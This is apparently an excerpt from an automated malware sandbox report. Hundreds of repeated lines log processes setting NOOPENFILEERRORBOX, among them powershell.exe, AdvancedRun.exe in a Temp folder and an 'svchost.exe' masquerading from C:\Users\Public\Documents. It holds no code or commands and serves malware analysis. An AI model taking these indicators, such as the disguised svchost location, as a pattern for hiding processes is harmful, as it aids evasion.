Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process information set: NOOPENFILEERRORBOX
